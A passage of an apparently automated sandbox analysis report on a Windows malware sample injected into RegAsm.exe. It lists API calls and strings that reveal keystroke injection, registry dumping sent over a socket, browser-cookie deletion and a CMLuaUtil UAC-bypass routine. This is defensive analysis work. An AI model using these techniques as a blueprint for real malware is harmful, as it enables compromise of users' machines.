                                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                          • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSend$Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1167301434-0
                                                                                                                                        • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                        • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                        • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                        • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                                                                                        • String ID: a/p$am/pm$h{D
                                                                                                                                        • API String ID: 2936374016-2303565833
                                                                                                                                        • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                        • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                        • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                        • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        • _free.LIBCMT ref: 00444E87
                                                                                                                                        • _free.LIBCMT ref: 00444E9E
                                                                                                                                        • _free.LIBCMT ref: 00444EBD
                                                                                                                                        • _free.LIBCMT ref: 00444ED8
                                                                                                                                        • _free.LIBCMT ref: 00444EEF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                        • String ID: KED
                                                                                                                                        • API String ID: 3033488037-2133951994
                                                                                                                                        • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                        • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                        • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                        • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                        APIs
                                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                                                        • String ID: [regsplt]$xUG$TG
                                                                                                                                        • API String ID: 3554306468-1165877943
                                                                                                                                        • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                        • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                        • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                        • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                        • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                        • __fassign.LIBCMT ref: 0044B514
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                        • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                        • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                        • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                        • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                        • __fassign.LIBCMT ref: 1000954F
                                                                                                                                        • __fassign.LIBCMT ref: 1000956A
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                        • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                        • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                        • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                        • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                          • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                          • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                        • String ID: xUG$NG$NG$TG
                                                                                                                                        • API String ID: 3114080316-2811732169
                                                                                                                                        • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                        • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                        • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                        • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                        APIs
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                        • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                        • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                        • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                        • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                          • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                          • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                          • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                        • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                        • API String ID: 3286818993-122982132
                                                                                                                                        • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                        • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                        • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                        • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                          • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                          • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                                                        • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                        • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                        • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                        • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                        • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                        • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                        • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                        • _free.LIBCMT ref: 00450FC8
                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 00450FD3
                                                                                                                                        • _free.LIBCMT ref: 00450FDE
                                                                                                                                        • _free.LIBCMT ref: 00451032
                                                                                                                                        • _free.LIBCMT ref: 0045103D
                                                                                                                                        • _free.LIBCMT ref: 00451048
                                                                                                                                        • _free.LIBCMT ref: 00451053
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                        • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                        • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                        • _free.LIBCMT ref: 100092AB
                                                                                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                        • _free.LIBCMT ref: 100092B6
                                                                                                                                        • _free.LIBCMT ref: 100092C1
                                                                                                                                        • _free.LIBCMT ref: 10009315
                                                                                                                                        • _free.LIBCMT ref: 10009320
                                                                                                                                        • _free.LIBCMT ref: 1000932B
                                                                                                                                        • _free.LIBCMT ref: 10009336
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                        • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                        • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                        • int.LIBCPMT ref: 004111BE
                                                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                        • String ID: (mG
                                                                                                                                        • API String ID: 2536120697-4059303827
                                                                                                                                        • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                        • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                        • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                        • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                        • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                        • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                        APIs
                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                          • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                          • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                        • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                        • API String ID: 3851391207-1839356972
                                                                                                                                        • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                        • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                        • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                        • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                        Strings
                                                                                                                                        • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                        • UserProfile, xrefs: 0040BAE8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                        • API String ID: 2018770650-304995407
                                                                                                                                        • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
